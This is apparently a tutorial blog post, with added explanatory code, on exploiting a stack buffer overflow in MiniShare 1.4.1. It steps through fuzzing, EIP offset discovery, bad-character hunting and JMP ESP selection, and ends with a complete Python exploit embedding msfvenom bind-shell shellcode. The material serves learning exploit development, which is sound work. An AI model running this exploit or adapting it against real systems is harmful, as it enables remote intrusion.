A first look at buffer overflows, part 1

    I spent some spare time studying buffer overflows; this is a brief record of the procedure.

    Target download: https://www.dropbox.com/s/zhivgb79wtbce37/minishare-1.4.1.exe?dl=0

    1. Fuzzing

    Goal: send enough data to crash the program.

    #!/usr/bin/python
    # Python 2. Send an oversized GET request to MiniShare on port 80.
    import socket,sys
    s=socket.socket(socket.AF_INET,socket.SOCK_STREAM)
    s.connect((sys.argv[1],80))
    buff="GET "
    buff+="A"*2000          # 2000 bytes of filler
    buff+=" HTTP/1.1\r\n\r\n"
    s.send(buff)
    s.close()

    Result, as shown in the figure: EIP has been overwritten.

    2. Determine the position of EIP.

    #!/usr/bin/python
    # Python 2. Confirm the offset: after 1787 bytes of filler, "BBBB" should
    # land exactly in EIP (42424242) and the C's should follow at ESP.
    import socket,sys
    s=socket.socket(socket.AF_INET,socket.SOCK_STREAM)
    s.connect((sys.argv[1],80))
    buff="GET "
    buff+="A"*1787
    buff+="BBBB"
    buff+="CCCCCCCCCCCCCCCCCCC"
    buff+=" HTTP/1.1\r\n\r\n"
    s.send(buff)
    s.close()
    

    #!/usr/bin/python
    # Python 2. Send a 2000-byte cyclic pattern (Metasploit pattern_create.rb -l 2000)
    # instead of the A's: the 4 bytes that land in EIP occur at a unique offset.
    import socket,sys
    s=socket.socket(socket.AF_INET,socket.SOCK_STREAM)
    s.connect((sys.argv[1],80))
    buff="GET "
    buff+=("Aa0Aa1Aa2Aa3Aa4Aa5Aa6Aa7Aa8Aa9Ab0Ab1Ab2Ab3Ab4Ab5Ab6Ab7Ab8Ab9Ac0Ac1Ac2Ac3Ac4Ac5Ac6Ac7Ac8Ac9"
    "Ad0Ad1Ad2Ad3Ad4Ad5Ad6Ad7Ad8Ad9Ae0Ae1Ae2Ae3Ae4Ae5Ae6Ae7Ae8Ae9Af0Af1Af2Af3Af4Af5Af6Af7Af8Af9"
    "Ag0Ag1Ag2Ag3Ag4Ag5Ag6Ag7Ag8Ag9Ah0Ah1Ah2Ah3Ah4Ah5Ah6Ah7Ah8Ah9Ai0Ai1Ai2Ai3Ai4Ai5Ai6Ai7Ai8Ai9"
    "Aj0Aj1Aj2Aj3Aj4Aj5Aj6Aj7Aj8Aj9Ak0Ak1Ak2Ak3Ak4Ak5Ak6Ak7Ak8Ak9Al0Al1Al2Al3Al4Al5Al6Al7Al8Al9"
    "Am0Am1Am2Am3Am4Am5Am6Am7Am8Am9An0An1An2An3An4An5An6An7An8An9Ao0Ao1Ao2Ao3Ao4Ao5Ao6Ao7Ao8Ao9"
    "Ap0Ap1Ap2Ap3Ap4Ap5Ap6Ap7Ap8Ap9Aq0Aq1Aq2Aq3Aq4Aq5Aq6Aq7Aq8Aq9Ar0Ar1Ar2Ar3Ar4Ar5Ar6Ar7Ar8Ar9"
    "As0As1As2As3As4As5As6As7As8As9At0At1At2At3At4At5At6At7At8At9Au0Au1Au2Au3Au4Au5Au6Au7Au8Au9"
    "Av0Av1Av2Av3Av4Av5Av6Av7Av8Av9Aw0Aw1Aw2Aw3Aw4Aw5Aw6Aw7Aw8Aw9Ax0Ax1Ax2Ax3Ax4Ax5Ax6Ax7Ax8Ax9"
    "Ay0Ay1Ay2Ay3Ay4Ay5Ay6Ay7Ay8Ay9Az0Az1Az2Az3Az4Az5Az6Az7Az8Az9Ba0Ba1Ba2Ba3Ba4Ba5Ba6Ba7Ba8Ba9"
    "Bb0Bb1Bb2Bb3Bb4Bb5Bb6Bb7Bb8Bb9Bc0Bc1Bc2Bc3Bc4Bc5Bc6Bc7Bc8Bc9Bd0Bd1Bd2Bd3Bd4Bd5Bd6Bd7Bd8Bd9"
    "Be0Be1Be2Be3Be4Be5Be6Be7Be8Be9Bf0Bf1Bf2Bf3Bf4Bf5Bf6Bf7Bf8Bf9Bg0Bg1Bg2Bg3Bg4Bg5Bg6Bg7Bg8Bg9"
    "Bh0Bh1Bh2Bh3Bh4Bh5Bh6Bh7Bh8Bh9Bi0Bi1Bi2Bi3Bi4Bi5Bi6Bi7Bi8Bi9Bj0Bj1Bj2Bj3Bj4Bj5Bj6Bj7Bj8Bj9"
    "Bk0Bk1Bk2Bk3Bk4Bk5Bk6Bk7Bk8Bk9Bl0Bl1Bl2Bl3Bl4Bl5Bl6Bl7Bl8Bl9Bm0Bm1Bm2Bm3Bm4Bm5Bm6Bm7Bm8Bm9"
    "Bn0Bn1Bn2Bn3Bn4Bn5Bn6Bn7Bn8Bn9Bo0Bo1Bo2Bo3Bo4Bo5Bo6Bo7Bo8Bo9Bp0Bp1Bp2Bp3Bp4Bp5Bp6Bp7Bp8Bp9"
    "Bq0Bq1Bq2Bq3Bq4Bq5Bq6Bq7Bq8Bq9Br0Br1Br2Br3Br4Br5Br6Br7Br8Br9Bs0Bs1Bs2Bs3Bs4Bs5Bs6Bs7Bs8Bs9"
    "Bt0Bt1Bt2Bt3Bt4Bt5Bt6Bt7Bt8Bt9Bu0Bu1Bu2Bu3Bu4Bu5Bu6Bu7Bu8Bu9Bv0Bv1Bv2Bv3Bv4Bv5Bv6Bv7Bv8Bv9"
    "Bw0Bw1Bw2Bw3Bw4Bw5Bw6Bw7Bw8Bw9Bx0Bx1Bx2Bx3Bx4Bx5Bx6Bx7Bx8Bx9By0By1By2By3By4By5By6By7By8By9"
    "Bz0Bz1Bz2Bz3Bz4Bz5Bz6Bz7Bz8Bz9Ca0Ca1Ca2Ca3Ca4Ca5Ca6Ca7Ca8Ca9Cb0Cb1Cb2Cb3Cb4Cb5Cb6Cb7Cb8Cb9"
    "Cc0Cc1Cc2Cc3Cc4Cc5Cc6Cc7Cc8Cc9Cd0Cd1Cd2Cd3Cd4Cd5Cd6Cd7Cd8Cd9Ce0Ce1Ce2Ce3Ce4Ce5Ce6Ce7Ce8Ce9"
    "Cf0Cf1Cf2Cf3Cf4Cf5Cf6Cf7Cf8Cf9Cg0Cg1Cg2Cg3Cg4Cg5Cg6Cg7Cg8Cg9Ch0Ch1Ch2Ch3Ch4Ch5Ch6Ch7Ch8Ch9"
    "Ci0Ci1Ci2Ci3Ci4Ci5Ci6Ci7Ci8Ci9Cj0Cj1Cj2Cj3Cj4Cj5Cj6Cj7Cj8Cj9Ck0Ck1Ck2Ck3Ck4Ck5Ck6Ck7Ck8Ck9"
    "Cl0Cl1Cl2Cl3Cl4Cl5Cl6Cl7Cl8Cl9Cm0Cm1Cm2Cm3Cm4Cm5Cm6Cm7Cm8Cm9Cn0Cn1Cn2Cn3Cn4Cn5Cn6Cn7Cn8Cn9"
    "Co0Co1Co2Co3Co4Co5Co")
    buff+=" HTTP/1.1\r\n\r\n"
    s.send(buff)
    s.close()
    

    With the cyclic pattern in the buffer, the four bytes that land in EIP occur at exactly one offset in the pattern, 1787, and the "BBBB" probe confirms it: EIP reads 42424242 and ESP points at the bytes that follow.
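    The two scripts above rely on a property of the cyclic pattern: every 4-byte window occurs at exactly one offset, so the value read from EIP maps back to a position in the buffer. As an added example (not code from the original post), the following Python 3 reimplements pattern_create.rb / pattern_offset.rb and performs that lookup. The EIP value 0x36684335 used in it is derived here from the offset 1787 (the pattern bytes at that offset are "5Ch6"), not read from the post.

```python
#!/usr/bin/env python3
"""Recovering the EIP offset with a cyclic pattern, the way Metasploit's
pattern_create.rb / pattern_offset.rb do it."""
import string
import struct

# One period of the pattern: 26 upper * 26 lower * 10 digits groups of 3 bytes.
PATTERN_PERIOD = 26 * 26 * 10 * 3


def pattern_create(length):
    """Return `length` bytes of Aa0Aa1Aa2...  Within one period no 4-byte
    window repeats (character classes fix the phase, the letters and digit
    fix the group), so 4 bytes read from EIP map to exactly one offset."""
    if length > PATTERN_PERIOD:
        raise ValueError("pattern repeats past %d bytes" % PATTERN_PERIOD)
    out = bytearray()
    for upper in string.ascii_uppercase:
        for lower in string.ascii_lowercase:
            for digit in string.digits:
                out += (upper + lower + digit).encode()
                if len(out) >= length:
                    return bytes(out[:length])
    return bytes(out)


def pattern_offset(pattern, eip):
    """Map the EIP value shown by the debugger back to an offset in `pattern`.
    x86 is little-endian: EIP 0x36684335 means the bytes 35 43 68 36 ("5Ch6")
    overwrote the saved return address, so pack with '<I' and search."""
    needle = struct.pack("<I", eip)
    return pattern.find(needle)    # -1: EIP did not come from our buffer


if __name__ == "__main__":
    pat = pattern_create(2000)
    print(pat[:30].decode(), "...", pat[-5:].decode())
    # EIP value corresponding to offset 1787 (derived, not taken from the post).
    eip = 0x36684335
    print("EIP %08x -> offset %d" % (eip, pattern_offset(pat, eip)))
```

    A result of -1 means the register value is not part of the pattern at all, which usually indicates the crash was not a clean return-address overwrite, or that the pattern was mangled in transit by a bad character.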

    3. Finding bad characters

    First send every byte value in one probe; code as follows:

    #!/usr/bin/python
    # Python 2. Place every byte value after the return address and inspect the
    # memory at ESP in the debugger; the first byte that differs is a bad character.
    import socket,sys
    s=socket.socket(socket.AF_INET,socket.SOCK_STREAM)
    s.connect((sys.argv[1],80))
    badchars = ("\x01\x02\x03\x04\x05\x06\x07\x08\x09\x0a\x0b\x0c\x0d\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f"
    "\x20\x21\x22\x23\x24\x25\x26\x27\x28\x29\x2a\x2b\x2c\x2d\x2e\x2f\x30\x31\x32\x33\x34\x35\x36\x37\x38\x39\x3a\x3b\x3c\x3d\x3e\x3f\x40"
    "\x41\x42\x43\x44\x45\x46\x47\x48\x49\x4a\x4b\x4c\x4d\x4e\x4f\x50\x51\x52\x53\x54\x55\x56\x57\x58\x59\x5a\x5b\x5c\x5d\x5e\x5f"
    "\x60\x61\x62\x63\x64\x65\x66\x67\x68\x69\x6a\x6b\x6c\x6d\x6e\x6f\x70\x71\x72\x73\x74\x75\x76\x77\x78\x79\x7a\x7b\x7c\x7d\x7e\x7f"
    "\x80\x81\x82\x83\x84\x85\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9e\x9f"
    "\xa0\xa1\xa2\xa3\xa4\xa5\xa6\xa7\xa8\xa9\xaa\xab\xac\xad\xae\xaf\xb0\xb1\xb2\xb3\xb4\xb5\xb6\xb7\xb8\xb9\xba\xbb\xbc\xbd\xbe\xbf"
    "\xc0\xc1\xc2\xc3\xc4\xc5\xc6\xc7\xc8\xc9\xca\xcb\xcc\xcd\xce\xcf\xd0\xd1\xd2\xd3\xd4\xd5\xd6\xd7\xd8\xd9\xda\xdb\xdc\xdd\xde\xdf"
    "\xe0\xe1\xe2\xe3\xe4\xe5\xe6\xe7\xe8\xe9\xea\xeb\xec\xed\xee\xef\xf0\xf1\xf2\xf3\xf4\xf5\xf6\xf7\xf8\xf9\xfa\xfb\xfc\xfd\xfe\xff")
    buff="GET "
    buff+="A"*1787
    buff += "BBBB"
    buff += badchars
    buff+=" HTTP/1.1\r\n\r\n"
    s.send(buff)
    s.close()

    Result:

    The dump ends in 0A 00 00, which means the copy stopped at \x0d. Remove \x0d from the probe and send it again; this time every byte comes through, as shown in the figure:

    So the only bad characters are \x0d and \x00 (\x00 was left out of the probe from the start, since it terminates C strings).
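    The procedure above is a loop: send the probe, compare the memory at ESP with what was sent, drop the first byte that was mangled, and repeat until the probe arrives intact. Only one culprit can be learned per round, because once a byte is mangled nothing after it can be trusted. As an added example (not code from the original post), the following Python 3 implements that loop. The real server is replaced by `simulated_minishare`, a constructed stand-in that stops copying at the first \x0d or \x00, matching the 0A 00 00 seen in the dump; against a live target, `send_and_dump` would deliver the probe and return the bytes read at ESP from the debugger.

```python
#!/usr/bin/env python3
"""Bad-character hunting as a loop: probe, compare with memory at ESP, drop
the first corrupted byte, repeat until the probe arrives intact."""


def badchar_probe(exclude=(0x00,)):
    """Every byte value 0x01..0xff in order, minus those already known bad.
    0x00 is excluded from the first round: it terminates C strings."""
    return bytes(b for b in range(0x01, 0x100) if b not in exclude)


def first_corruption(sent, dumped):
    """Return the first probe byte that does not show up where expected in
    `dumped` (the memory at ESP after the crash), or None if all survived.
    A dump shorter than the probe counts as corruption at the cut point."""
    for want, got in zip(sent, dumped):
        if want != got:
            return want
    if len(dumped) < len(sent):
        return sent[len(dumped)]
    return None


def hunt_badchars(send_and_dump, max_rounds=8):
    """Drive the loop. `send_and_dump(probe)` delivers the probe to the target
    and returns the bytes found at ESP. One culprit is learned per round."""
    bad = {0x00}
    for _ in range(max_rounds):
        probe = badchar_probe(bad)
        culprit = first_corruption(probe, send_and_dump(probe))
        if culprit is None:
            return sorted(bad)
        bad.add(culprit)
    raise RuntimeError("probe still corrupted after %d rounds" % max_rounds)


def simulated_minishare(probe):
    """Constructed stand-in for the real server (an assumption of this example):
    the copy stops at the first 0x00 or 0x0d and the rest of the buffer stays
    zero, which reproduces the 0A 00 00 pattern the page saw in the dump."""
    cut = len(probe)
    for terminator in (0x00, 0x0d):
        idx = probe.find(bytes([terminator]))
        if idx != -1:
            cut = min(cut, idx)
    return probe[:cut] + b"\x00" * (len(probe) - cut)


if __name__ == "__main__":
    found = hunt_badchars(simulated_minishare)
    print("bad characters:", " ".join("\\x%02x" % b for b in found))
    # The cleaned probe is what goes after "BBBB" in the next test round.
    print(repr(badchar_probe(found)[:16]), "...")
```

    With a real target each round is one crash in the debugger, so the loop stays manual; the value of writing it out is that the comparison is done byte by byte against the full 255-byte probe rather than by eye.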

    4. Finding a JMP ESP

    When the crash happens we want the bytes at ESP to be executed, so EIP has to be redirected to ESP, which a JMP ESP instruction does. Open the server in Immunity Debugger, look for an executable module that contains a JMP ESP instruction, and overwrite EIP with the address of that instruction. The address itself goes into the request in little-endian byte order, so it must not contain any of the bad characters found in step 3, and it should come from a module that mona reports as not rebased and without ASLR, so that it is the same at every start.

    Click View - Executable modules to see the list of executable modules.

    Or use mona: !mona jmp -r esp writes the candidates to C:\Program Files\Immunity Inc\Immunity Debugger\jmp.txt, as shown in the figure:

    I picked one of them: 0x77438265

    5. Generating the shellcode

    Generate the shellcode with msfvenom and add it to the exploit:

    #!/usr/bin/python
    # Python 2. Final exploit: filler up to EIP, jmp esp address, NOP sled, shellcode.
    import socket,sys

    # Shellcode generated with:
    #   msfvenom -p windows/shell_bind_tcp -a x86 --platform win -b "\x00\x0d" -f c
    # Return address 0x77438265 written little-endian: \x65\x82\x43\x77
    s=socket.socket(socket.AF_INET,socket.SOCK_STREAM)
    s.connect((sys.argv[1],80))
    buff="GET "
    buff+="A"*1787
    buff+="\x65\x82\x43\x77"  # address of the jmp esp instruction in user32.dll
    buff+="\x90"*20           # 20 NOPs as a landing sled; ESP points here after the jmp
    buff += ("\xb8\x63\x81\xa1\x61\xdb\xc8\xd9\x74\x24\xf4\x5d\x29\xc9\xb1"
    "\x53\x83\xc5\x04\x31\x45\x0e\x03\x26\x8f\x43\x94\x54\x67\x01"
    "\x57\xa4\x78\x66\xd1\x41\x49\xa6\x85\x02\xfa\x16\xcd\x46\xf7"
    "\xdd\x83\x72\x8c\x90\x0b\x75\x25\x1e\x6a\xb8\xb6\x33\x4e\xdb"
    "\x34\x4e\x83\x3b\x04\x81\xd6\x3a\x41\xfc\x1b\x6e\x1a\x8a\x8e"
    "\x9e\x2f\xc6\x12\x15\x63\xc6\x12\xca\x34\xe9\x33\x5d\x4e\xb0"
    "\x93\x5c\x83\xc8\x9d\x46\xc0\xf5\x54\xfd\x32\x81\x66\xd7\x0a"
    "\x6a\xc4\x16\xa3\x99\x14\x5f\x04\x42\x63\xa9\x76\xff\x74\x6e"
    "\x04\xdb\xf1\x74\xae\xa8\xa2\x50\x4e\x7c\x34\x13\x5c\xc9\x32"
    "\x7b\x41\xcc\x97\xf0\x7d\x45\x16\xd6\xf7\x1d\x3d\xf2\x5c\xc5"
    "\x5c\xa3\x38\xa8\x61\xb3\xe2\x15\xc4\xb8\x0f\x41\x75\xe3\x47"
    "\xa6\xb4\x1b\x98\xa0\xcf\x68\xaa\x6f\x64\xe6\x86\xf8\xa2\xf1"
    "\xe9\xd2\x13\x6d\x14\xdd\x63\xa4\xd3\x89\x33\xde\xf2\xb1\xdf"
    "\x1e\xfa\x67\x75\x16\x5d\xd8\x68\xdb\x1d\x88\x2c\x73\xf6\xc2"
    "\xa2\xac\xe6\xec\x68\xc5\x8f\x10\x93\xf8\x13\x9c\x75\x90\xbb"
    "\xc8\x2e\x0c\x7e\x2f\xe7\xab\x81\x05\x5f\x5b\xc9\x4f\x58\x64"
    "\xca\x45\xce\xf2\x41\x8a\xca\xe3\x55\x87\x7a\x74\xc1\x5d\xeb"
    "\x37\x73\x61\x26\xaf\x10\xf0\xad\x2f\x5e\xe9\x79\x78\x37\xdf"
    "\x73\xec\xa5\x46\x2a\x12\x34\x1e\x15\x96\xe3\xe3\x98\x17\x61"
    "\x5f\xbf\x07\xbf\x60\xfb\x73\x6f\x37\x55\x2d\xc9\xe1\x17\x87"
    "\x83\x5e\xfe\x4f\x55\xad\xc1\x09\x5a\xf8\xb7\xf5\xeb\x55\x8e"
    "\x0a\xc3\x31\x06\x73\x39\xa2\xe9\xae\xf9\xd2\xa3\xf2\xa8\x7a"
    "\x6a\x67\xe9\xe6\x8d\x52\x2e\x1f\x0e\x56\xcf\xe4\x0e\x13\xca"
    "\xa1\x88\xc8\xa6\xba\x7c\xee\x15\xba\x54")
    buff+=" HTTP/1.1\r\n\r\n"
    s.send(buff)
    s.close()
    

      

    6. Exploitation
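    Steps 4 and 5 above come down to three mechanical checks: find the bytes of an instruction that transfers control to ESP, make sure the chosen address survives the transport, and place it at the right offset in little-endian order. As an added example (not the original post's code, and not mona), the following Python 3 does the scan by hand over a module image, filters out addresses that contain a bad character, packs the address, and assembles the request. The module image, its base 0x77400000 and the INT3 (\xcc) stage used in place of the real shellcode are constructed for this example; the INT3 stage is the usual first test that control really reaches ESP before the msfvenom payload goes in.

```python
#!/usr/bin/env python3
"""Finding a return address that lands in our buffer, and assembling the
request: the jmp esp search mona does, done by hand on a module image."""
import struct

BADCHARS = b"\x00\x0d"      # from step 3
EIP_OFFSET = 1787           # from step 2

# x86 encodings that redirect execution to ESP.
ESP_GADGETS = {
    b"\xff\xe4": "jmp esp",
    b"\xff\xd4": "call esp",
    b"\x54\xc3": "push esp; ret",
}


def find_esp_gadgets(image, base):
    """Scan a module image for the gadget opcodes; return sorted (address, name).
    `image` must be the module as mapped in memory (what the debugger sees):
    a raw PE file on disk has section file offsets that differ from its
    virtual addresses, so scanning it directly gives wrong addresses."""
    hits = []
    for opcodes, name in ESP_GADGETS.items():
        pos = image.find(opcodes)
        while pos != -1:
            hits.append((base + pos, name))
            pos = image.find(opcodes, pos + 1)
    return sorted(hits)


def le32(addr):
    """Pack an address as it must appear in the buffer (little-endian):
    0x77438265 -> 65 82 43 77."""
    return struct.pack("<I", addr)


def contains_badchar(data, badchars=BADCHARS):
    return any(b in badchars for b in data)


def usable_gadgets(image, base):
    """Keep only addresses whose own four bytes survive the transport."""
    return [(a, n) for a, n in find_esp_gadgets(image, base)
            if not contains_badchar(le32(a))]


def build_request(ret_addr, shellcode, nops=20):
    """'GET ' + filler up to EIP + return address + NOP sled + shellcode.
    After the overwritten return executes, ESP points just past the saved
    EIP slot, i.e. at the start of the sled, which is why jmp esp works."""
    if contains_badchar(le32(ret_addr)):
        raise ValueError("return address contains a bad character")
    if contains_badchar(shellcode):
        raise ValueError("shellcode contains a bad character; re-encode with -b")
    payload = b"A" * EIP_OFFSET + le32(ret_addr) + b"\x90" * nops + shellcode
    return b"GET " + payload + b" HTTP/1.1\r\n\r\n"


if __name__ == "__main__":
    # Constructed module image: zeros with two gadgets planted. The base is
    # chosen so the first hit's address contains 0x00 and is unusable.
    image = bytearray(0x200)
    image[0x100:0x102] = b"\xff\xe4"
    image[0x152:0x154] = b"\x54\xc3"
    base = 0x77400000
    for addr, name in find_esp_gadgets(bytes(image), base):
        ok = "ok" if not contains_badchar(le32(addr)) else "has bad char"
        print("0x%08x  %-14s %s" % (addr, name, ok))
    # INT3 stage: the debugger should stop at the breakpoint right after the jmp.
    req = build_request(0x77438265, b"\xcc" * 4)
    print(len(req), req[4 + EIP_OFFSET:4 + EIP_OFFSET + 4].hex())
```

    If the breakpoint fires with the INT3 stage, the msfvenom output from step 5 replaces it unchanged; if it does not, the offset or the address is wrong and no amount of shellcode tuning will help.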

    Original post: https://www.cnblogs.com/whoami101/p/9476933.html